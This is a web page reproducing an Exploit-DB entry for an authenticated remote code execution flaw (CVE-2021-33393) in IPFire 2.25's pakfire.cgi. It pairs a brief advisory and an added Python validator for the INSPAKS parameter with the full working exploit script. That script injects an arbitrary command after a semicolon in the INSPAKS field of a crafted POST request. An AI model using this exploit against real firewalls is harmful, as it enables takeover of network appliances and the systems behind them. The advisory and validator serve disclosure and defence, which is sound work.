Vendor: IPFire
By: Mücahit Saratar

IPFire 2.25 – Remote Code Execution (Authenticated)

A vulnerability in IPFire 2.25 allows an authenticated user to execute arbitrary code on the target system. This is due to the lack of proper input validation in the 'pakfire.cgi' script, which allows an attacker to inject malicious code into the 'INSPAKS' parameter. This can be exploited by sending a specially crafted HTTP POST request to the vulnerable script.

Mitigation:

Upgrade to the latest version of IPFire 2.25.
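The advisory's root cause is the unvalidated INSPAKS parameter, so a defensive counterpart to the exploit below is a strict check on that parameter before it reaches pakfire.cgi, for example in a reverse proxy or a CGI wrapper. The following is an added example written for this page, not IPFire's code; the allowlisted package-name character set and the sample request bodies are assumptions constructed here.

```python
import re
from urllib.parse import parse_qs

# Hardening rule for this example: a pakfire package identifier may contain
# only letters, digits, '.', '_', '+' and '-'. This allowlist is an assumption
# made here, not the validation IPFire itself applies.
PACKAGE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$")

# Characters that let a value break out of a shell command string.
SHELL_META = re.compile(r"[;&|`$<>(){}\s\\'\"]")


def validate_inspaks(body: str) -> dict:
    """Check the INSPAKS values of a pakfire.cgi POST body.

    Returns {'ok': bool, 'packages': [...], 'rejected': [(value, reason), ...]}
    so a reverse proxy or CGI wrapper can block the request and log why.
    """
    fields = parse_qs(body, keep_blank_values=True)
    result = {"ok": True, "packages": [], "rejected": []}

    # An install action with no package list is malformed; reject it outright.
    if fields.get("ACTION") == ["install"] and not fields.get("INSPAKS"):
        result["ok"] = False
        result["rejected"].append(("", "install without INSPAKS"))
        return result

    for value in fields.get("INSPAKS", []):
        if SHELL_META.search(value):
            result["rejected"].append((value, "shell metacharacter"))
        elif not PACKAGE_NAME.match(value):
            result["rejected"].append((value, "not a package identifier"))
        else:
            result["packages"].append(value)

    result["ok"] = not result["rejected"]
    return result


# Constructed sample bodies (not captured traffic): a normal install and the
# pattern the advisory describes, a package name followed by ';' and a command.
BENIGN = "INSPAKS=7zip&INSPAKS=clamav&ACTION=install&x=10&y=6"
INJECTED = "INSPAKS=7zip%3Binjected-command&ACTION=install&x=10&y=6"

if __name__ == "__main__":
    for body in (BENIGN, INJECTED):
        print(validate_inspaks(body))
```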

Exploit-DB raw data:

# Exploit Title: IPFire 2.25 - Remote Code Execution (Authenticated)
# Date: 15/05/2021
# Exploit Author: Mücahit Saratar
# Vendor Homepage: https://www.ipfire.org/
# Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
# Version: 2.25 - core update 156
# Tested on: parrot os 5.7.0-2parrot2-amd64
# CVE: CVE-2021-33393

#!/usr/bin/python3

import requests as R
import sys
import base64

# Usage: script.py http://target:444 username password command
try:
    host = sys.argv[1]
    assert host[:4] == "http" and host[-1] != "/"
    url = host + "/cgi-bin/pakfire.cgi"
    username = sys.argv[2]
    password = sys.argv[3]
    komut = sys.argv[4]  # komut = "command" (Turkish)
except (IndexError, AssertionError):
    print(f"{sys.argv[0]} http://target.com:444 username password command")
    sys.exit(1)

# veri = "data" (Turkish): the form fields of the install request. The command
# follows the package name after ';' in INSPAKS, the parameter that
# pakfire.cgi does not validate.
veri = {
    "INSPAKS": f"7zip;{komut}",
    "ACTION": "install",
    "x": "10",
    "y": "6",
}

# HTTP Basic authentication: the exploit requires valid credentials.
token = "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()
header = {
    "Authorization": token,
    "Connection": "close",
    "Cache-Control": "max-age=0",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36",
    "Origin": host,
    "Sec-GPC": "1",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-User": "?1",
    "Sec-Fetch-Dest": "document",
    "Referer": host,
}

# verify=False skips TLS certificate verification (the appliance typically
# serves a self-signed certificate).
R.post(url, data=veri, headers=header, verify=False)
print("Done.")